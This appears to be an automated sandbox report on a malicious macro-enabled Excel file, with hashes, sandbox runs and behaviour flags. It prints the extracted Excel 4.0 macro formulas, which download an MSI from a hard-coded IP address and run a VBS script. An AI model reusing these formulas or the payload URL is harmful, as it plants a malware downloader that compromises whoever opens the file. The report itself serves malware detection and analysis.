General
-
Target
b58819478207e2b02133f400a88f9936
-
Size
6KB
-
Sample
231222-rc3s2sefck
-
MD5
b58819478207e2b02133f400a88f9936
-
SHA1
3b759676bd6bd336597a9d87de0ef45657749d49
-
SHA256
53f8c6db4bcef875a92d7e19b2a864ec1de6ecbd6ed5296a23d58fa9654250ae
-
SHA512
20045a5d71ce995402947dde4ad3ac9258a96d9f92fbd667ab1ea62a00e056c46187252d1b6c4d7223558b2d428d228be5b8b5791552a5618a7283009227ebb3
-
SSDEEP
192:NDSvuSlbrA2OmmfRU8UhHFBFYuCb98ywOMOruO5pOGOrOd+mOTOzOPOIOd:N8uuM2we1FY/b98ywOMOruO5pOGOrOPj
Static task
static1
Behavioral task
behavioral1
Sample
b58819478207e2b02133f400a88f9936.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
b58819478207e2b02133f400a88f9936.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
b58819478207e2b02133f400a88f9936
-
Size
6KB
-
MD5
b58819478207e2b02133f400a88f9936
-
SHA1
3b759676bd6bd336597a9d87de0ef45657749d49
-
SHA256
53f8c6db4bcef875a92d7e19b2a864ec1de6ecbd6ed5296a23d58fa9654250ae
-
SHA512
20045a5d71ce995402947dde4ad3ac9258a96d9f92fbd667ab1ea62a00e056c46187252d1b6c4d7223558b2d428d228be5b8b5791552a5618a7283009227ebb3
-
SSDEEP
192:NDSvuSlbrA2OmmfRU8UhHFBFYuCb98ywOMOruO5pOGOrOd+mOTOzOPOIOd:N8uuM2we1FY/b98ywOMOruO5pOGOrOPj
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-